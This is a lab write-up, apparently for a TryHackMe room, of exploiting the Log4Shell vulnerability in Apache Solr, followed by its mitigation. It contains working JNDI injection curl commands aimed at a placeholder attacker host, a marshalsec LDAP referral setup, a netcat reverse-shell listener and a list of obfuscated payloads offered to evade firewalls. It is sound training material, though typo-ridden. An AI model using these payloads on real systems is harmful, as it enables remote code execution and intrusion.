1.What service is running on port 8983? (Just the name of the software) Answer:Aache solr
-p- scan all ports
-sV -service version
1.Take a close look at the first page visible when navigating to http://10.65.142.0:8983 (opens in new tab). You should be able to see clear indicators that log4j is in use within the application for logging activity. What is the -Dsolr.log.dir argument set to, displayed on the front page?
Answer: /var/solr/logs
-
One file has a significant number of INFO entries showing repeated requests to one specific URL endpoint. Which file includes contains this repeated entry?
YOU CAN FIND MORE REQUESTS ARE IN GIVEN FILES (MENTION THE FILE NAME)
Answer: solr.log
- What "path" or URL endpoint is indicated in these repeated entries?
IN SAME FILE SOLR.LOG HAS THE PATH
Answer:/admin/cores
- Viewing these log entries, what field name indicates some data entrypoint that you as a user could control?
FINDING SOLR.LOG WE SEE MANY REQUESTS BUT NOT PARAMETER ARE NOT PASSED SO USER CAN DONE BUT ITS EMPTY params{}.
Answer:params
FIRST know your ip.
using ip a
nc -lvnp 9999
OPEN ANOTHER TERMINAL
curl 'http://MACHINE_IP:8983/solr/admin/cores?foo=${jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:9999}'
ITS GET REPONSE IN (nc -lvnp 9999)THE CONNECTION IS WORKING,THEN EXPLOIT
# Exploitation
**I HAVE DONE IN MY MACHINE NOT IN THE ATTACK BOX.**
THEY ALSO PROVIDE INSTRUCTION TO FOLLOW THE WITHOUT ATTACK BOX
obtaining the LDAP Referral Server which already in git
Initially command : git clone https://github.com/mbechler/marshalsec
Start LDAP server java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://192.168.188.160:8000/#Exploit
Answer:listing on 0.0.0.0:1389
start Exploit java
CREATE THE JAVA FILE AND RUN IT
*IMP SAME FOLDER RUN PYTHON *
*Start netcat*
nc -lvnp 9999
**Execute the code**
# curl 'http://MACHINE_IP:8983/solr/admin/cores?foo=$\{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit\}'
**finally**
we get access
To better understand this log4j vulnerability,
let's grant ourselves "better access" so we can explore the machine
Analyze the affected logs
And even mitigate the vulnerability! 1.WHOAMI
Answer:solr
NOTE:Here everthing is lokking same command and answer so
python3 -c "import pty; pty.spawn('/bin/bash')"
sudo -l -Check super user permissions. For your convenience in this exercise, your user should have sudo privileges without the need for any password.
Now access into the machine via SSH, momentarily become root and change the password for the solr user to one of your choosing.
.sudo bash .passwd eleven .renter thr passwd eleven
exit from the netcat ssh solor@mahcineip
we alredy know the task 3 solr.log path var/solr/logs
cat /var/solar/logs
We can checks that our code is executed
EVEN NOW FIREWALL MAKE STOPS THE JDIN LDAP OR SUCH THING BUT->Some tricking ways to bypasses or mention in the below such
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}
solr.in.sh its contain apache server config files
locate solr.in.sh
1.What is the full path of the specific solr.in.sh file?
Answer:/etc/default/solr.in.sh
cd to /etc/default
nano solr.in.sh 'SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"' paste in the file inside
(its solve the expolittation of restict)
And the restart the command # sudo /etc/init.d/solr restart
Succesfully done ,now we are going to check agin the exploit
If you check its not receive the request and trigger
If update 2.17.0 latest version Disable jdn Where appropriate, please ensure you patch the logging-log4j package to version 2.16.0 or higher (as new releases come available). In version 2.16.0 , JNDI is fully disabled, support for Message Lookups is removed, and the new Dos vulnerability CVE-2021-45046 is not present. Download this release here: https://github.com//logging-log4j2/releases/tag/rel%2F2.16.0
Room CREATED by JohnHammond